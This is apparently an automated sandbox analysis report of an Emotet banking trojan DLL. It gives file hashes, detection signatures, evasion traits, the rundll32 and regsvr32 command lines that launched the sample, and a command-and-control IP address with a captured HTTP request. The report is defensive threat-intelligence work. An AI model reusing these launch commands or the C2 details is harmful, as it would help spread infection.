Edit tour

Windows Analysis Report
auExrOTnvB

Overview

General Information

Sample Name:	auExrOTnvB (renamed file extension from none to dll)
Analysis ID:	626499
MD5:	e7d280d6c63840b28ca759ff07747ea1
SHA1:	581dba2d1101e09dfeb290059c632ab266da49e3
SHA256:	a1637271aa4a35c54d8df7f9c62bb31ae3bf58c9c390bc1b1ce717cdf3eaeb2c
Tags:	exetrojan
Infos:

Detection

Emotet

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Query firmware table information (likely to detect VMs)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Found evasive API chain (may stop execution after checking a module file name)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Program does not show much activity (idle)

IP address seen in connection with other malware

AV process strings found (often used to terminate AV products)

PE file contains an invalid checksum

Tries to load missing DLLs

Drops PE files to the windows directory (C:\Windows)

Checks if the current process is being debugged

Registers a DLL

Queries disk information (often used to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll64.exe (PID: 7076 cmdline: loaddll64.exe "C:\Users\user\Desktop\auExrOTnvB.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)

cmd.exe (PID: 7112 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\auExrOTnvB.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

rundll32.exe (PID: 7152 cmdline: rundll32.exe "C:\Users\user\Desktop\auExrOTnvB.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)

regsvr32.exe (PID: 7140 cmdline: regsvr32.exe /s C:\Users\user\Desktop\auExrOTnvB.dll MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 4888 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PlUoNfxsJl\nlEiWRnuQfGg.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

rundll32.exe (PID: 7164 cmdline: rundll32.exe C:\Users\user\Desktop\auExrOTnvB.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 4160 cmdline: rundll32.exe C:\Users\user\Desktop\auExrOTnvB.dll,DllUnregisterServer MD5: 73C519F050C20580F8A62C849D49215A)

svchost.exe (PID: 2268 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 1372 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2884 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7052 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 1892 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6112 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2772 cmdline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.365208101.00000237001B0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.365205750.000002135E670000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.875184317.0000000000E70000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.367002552.0000000000580000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.876067804.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.regsvr32.exe.580000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.2135e670000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.237001b0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.2135e670000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.237001b0000.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.regsvr32.exe.e70000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.580000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.regsvr32.exe.e70000.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 3 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: auExrOTnvB.dll

Virustotal: Detection: 32%

Perma Link

Antivirus detection for URL or domain

Source: https://23.239.0.12/m	Avira URL Cloud: Label: malware
Source: https://23.239.0.12/h	Avira URL Cloud: Label: malware

Source: unknown

HTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.7:49771 version: TLS 1.2

Source: auExrOTnvB.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: msacm32.pdb source: regsvr32.exe, 00000006.00000002.874999274.0000000000B95000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000006.00000002.874999274.0000000000B95000.00000004.00000010.00020000.00000000.sdmp

Source: C:\Windows\System32\regsvr32.exe

Code function: 6_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,

6_2_000000018000D26C

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe

Network Connect: 23.239.0.12 443

Jump to behavior

Source: Joe Sandbox View

ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS

Source: Joe Sandbox View

JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Cookie: gKBwCZiad=NW34A/ewe7FxqPhMAuK21ZwVv3rdZ87BskOx+wjRUAnfBaq4cf9aNBgPNCTT1N6Kdnjcay3P/dq7IPXK3Ur94zkIJrYMuf9rco7HnCAxSoMXPKPPSGHF/JuCkMcIkLPKPgQcrtnYZzk+qIW2jl1yEgNtAYiTvtfm8DPlYXQpM4FFwfgEU7ZYkmIwQGBGuAol5ZW3uboPMBOB+sGL8hqhjv/okvEbAGaS9CLfg0hoMbMG/kvUASBfnS/D7Kcz1OPFkX5zF0NLSsP/VZKbEWabu2YN6iUNc9eG6HtC15UDzoqQUwiOtqpJHTiGw4eKylajDrqpMZZgT1o6Host: 23.239.0.12Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 23.239.0.12 23.239.0.12

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 23.239.0.12
Source: unknown	TCP traffic detected without corresponding DNS query: 23.239.0.12
Source: unknown	TCP traffic detected without corresponding DNS query: 23.239.0.12
Source: unknown	TCP traffic detected without corresponding DNS query: 23.239.0.12
Source: unknown	TCP traffic detected without corresponding DNS query: 23.239.0.12
Source: unknown	TCP traffic detected without corresponding DNS query: 23.239.0.12
Source: unknown	TCP traffic detected without corresponding DNS query: 23.239.0.12
Source: unknown	TCP traffic detected without corresponding DNS query: 23.239.0.12
Source: unknown	TCP traffic detected without corresponding DNS query: 23.239.0.12

Source: regsvr32.exe, 00000006.00000002.875860034.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.436135097.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.589107580.000001E811500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.876538284.00000225A2463000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.875885150.0000019616AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000014.00000002.589025244.000001E810CEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.876538284.00000225A2463000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000014.00000003.557823395.000001E81159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: regsvr32.exe, 00000006.00000002.875696976.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://23.239.0.12/
Source: regsvr32.exe, 00000006.00000002.875809902.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.436169934.0000000000F03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.436315168.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.436258983.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://23.239.0.12/h
Source: regsvr32.exe, 00000006.00000002.875696976.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://23.239.0.12/m
Source: svchost.exe, 00000014.00000003.557823395.000001E81159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 00000014.00000003.553593466.000001E811A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.552511760.000001E811A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.552433864.000001E811A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.553102642.000001E81159A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.553365480.000001E8115AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.hotspotshield.com/
Source: svchost.exe, 00000014.00000003.557823395.000001E81159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000014.00000003.557823395.000001E81159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 00000014.00000003.553593466.000001E811A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.552511760.000001E811A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.552433864.000001E811A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.553102642.000001E81159A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.553365480.000001E8115AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.hotspotshield.com/terms/
Source: svchost.exe, 00000014.00000003.553593466.000001E811A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.552511760.000001E811A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.552433864.000001E811A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.553102642.000001E81159A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.553365480.000001E8115AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.pango.co/privacy
Source: svchost.exe, 00000014.00000003.563989076.000001E81159C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.564051263.000001E811A02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: C:\Windows\System32\regsvr32.exe

Code function: 6_2_00000001800132F0 InternetReadFile,RtlAllocateHeap,

6_2_00000001800132F0

Source: global traffic

Source: unknown

HTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.7:49771 version: TLS 1.2

E-Banking Fraud

Yara detected Emotet

Source: Yara match	File source: 2.2.regsvr32.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2135e670000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.237001b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2135e670000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.237001b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.e70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.e70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.365208101.00000237001B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.365205750.000002135E670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.875184317.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367002552.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.876067804.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\regsvr32.exe

File deleted: C:\Windows\System32\PlUoNfxsJl\nlEiWRnuQfGg.dll:Zone.Identifier

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

File created: C:\Windows\system32\PlUoNfxsJl\

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00007FF8CB7EFCA0	2_2_00007FF8CB7EFCA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00007FF8CB7EA77C	2_2_00007FF8CB7EA77C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00007FF8CB7E6F0C	2_2_00007FF8CB7E6F0C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00007FF8CB7EEB60	2_2_00007FF8CB7EEB60
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00007FF8CB7EAF70	2_2_00007FF8CB7EAF70
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00007FF8CB7EFB6C	2_2_00007FF8CB7EFB6C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00007FF8CB7EE6C0	2_2_00007FF8CB7EE6C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00007FF8CB7EAA0C	2_2_00007FF8CB7EAA0C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00007FF8CB7EB5CC	2_2_00007FF8CB7EB5CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00007FF8CB7E5944	2_2_00007FF8CB7E5944
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00007FF8CB7E895C	2_2_00007FF8CB7E895C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00570000	2_2_00570000
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180010FF4	2_2_0000000180010FF4
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180028C20	2_2_0000000180028C20
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018002C058	2_2_000000018002C058
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180009100	2_2_0000000180009100
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180007958	2_2_0000000180007958
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001C964	2_2_000000018001C964
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018000C608	2_2_000000018000C608
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180021618	2_2_0000000180021618
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180013E28	2_2_0000000180013E28
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001E3AC	2_2_000000018001E3AC
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001DBE8	2_2_000000018001DBE8
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001FC0C	2_2_000000018001FC0C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018000580C	2_2_000000018000580C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180022010	2_2_0000000180022010
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001481C	2_2_000000018001481C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018002A42C	2_2_000000018002A42C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180011834	2_2_0000000180011834
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180023831	2_2_0000000180023831
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180021C3C	2_2_0000000180021C3C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018000703C	2_2_000000018000703C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018000AC48	2_2_000000018000AC48
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018000FC48	2_2_000000018000FC48
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180024458	2_2_0000000180024458
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180006458	2_2_0000000180006458
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001C05C	2_2_000000018001C05C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001A460	2_2_000000018001A460
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180029888	2_2_0000000180029888
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001D49C	2_2_000000018001D49C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180008CA0	2_2_0000000180008CA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800248A8	2_2_00000001800248A8
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180015CB0	2_2_0000000180015CB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800124B4	2_2_00000001800124B4
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018000C4B4	2_2_000000018000C4B4
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800288B8	2_2_00000001800288B8
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800024B8	2_2_00000001800024B8
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018000D8C4	2_2_000000018000D8C4
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800250CC	2_2_00000001800250CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800190D4	2_2_00000001800190D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180017CE4	2_2_0000000180017CE4
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800264F0	2_2_00000001800264F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800014F8	2_2_00000001800014F8
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180020CFC	2_2_0000000180020CFC
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018002C904	2_2_000000018002C904
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180017908	2_2_0000000180017908
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180021510	2_2_0000000180021510
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018000F917	2_2_000000018000F917
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018000551C	2_2_000000018000551C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018000F128	2_2_000000018000F128
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001CD38	2_2_000000018001CD38
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180016D3C	2_2_0000000180016D3C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001F944	2_2_000000018001F944
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180018148	2_2_0000000180018148
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001D950	2_2_000000018001D950
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180013150	2_2_0000000180013150
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001ED50	2_2_000000018001ED50
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001E960	2_2_000000018001E960
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180019D60	2_2_0000000180019D60
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180001D68	2_2_0000000180001D68
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001496C	2_2_000000018001496C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180002D70	2_2_0000000180002D70
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180024574	2_2_0000000180024574
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180002178	2_2_0000000180002178
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180024D80	2_2_0000000180024D80
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180018598	2_2_0000000180018598
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180003598	2_2_0000000180003598
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018002A9A8	2_2_000000018002A9A8
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800119A8	2_2_00000001800119A8
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180025DAC	2_2_0000000180025DAC
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180018DAC	2_2_0000000180018DAC
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800269B0	2_2_00000001800269B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800059B8	2_2_00000001800059B8
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800029BC	2_2_00000001800029BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800141C0	2_2_00000001800141C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800125C4	2_2_00000001800125C4
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800121CC	2_2_00000001800121CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018000BDD0	2_2_000000018000BDD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800075D4	2_2_00000001800075D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800095DC	2_2_00000001800095DC
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018000F9E8	2_2_000000018000F9E8
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180002610	2_2_0000000180002610
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180019618	2_2_0000000180019618
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001FA38	2_2_000000018001FA38
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018000A270	2_2_000000018000A270
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180019E78	2_2_0000000180019E78
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001DA80	2_2_000000018001DA80
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180024698	2_2_0000000180024698
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018000EE98	2_2_000000018000EE98
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800176B8	2_2_00000001800176B8
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001AAB8	2_2_000000018001AAB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180011AD0	2_2_0000000180011AD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180008AD8	2_2_0000000180008AD8
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800296EC	2_2_00000001800296EC
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018000A6EC	2_2_000000018000A6EC
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800132F0	2_2_00000001800132F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180019300	2_2_0000000180019300
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001BB04	2_2_000000018001BB04
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018002870C	2_2_000000018002870C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180026B10	2_2_0000000180026B10
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018000131C	2_2_000000018000131C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018000671C	2_2_000000018000671C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180029B28	2_2_0000000180029B28
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180012F28	2_2_0000000180012F28
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018000BB28	2_2_000000018000BB28
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001EB30	2_2_000000018001EB30
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180020334	2_2_0000000180020334
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180010758	2_2_0000000180010758
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001435C	2_2_000000018001435C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180009F5C	2_2_0000000180009F5C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180029368	2_2_0000000180029368
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180020768	2_2_0000000180020768
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180017378	2_2_0000000180017378
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180013780	2_2_0000000180013780
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180015388	2_2_0000000180015388
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018000338C	2_2_000000018000338C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018000738C	2_2_000000018000738C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180002790	2_2_0000000180002790
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180027F9C	2_2_0000000180027F9C
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800197A0	2_2_00000001800197A0
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018002C7B4	2_2_000000018002C7B4
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001DFB4	2_2_000000018001DFB4
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018001F7C0	2_2_000000018001F7C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800097C0	2_2_00000001800097C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_00000001800157D8	2_2_00000001800157D8
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180019FDC	2_2_0000000180019FDC
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180017BDC	2_2_0000000180017BDC
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_000000018000F7E0	2_2_000000018000F7E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 2_2_0000000180001FE0	2_2_0000000180001FE0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180010FF4	3_2_0000000180010FF4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002C058	3_2_000000018002C058
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180009100	3_2_0000000180009100
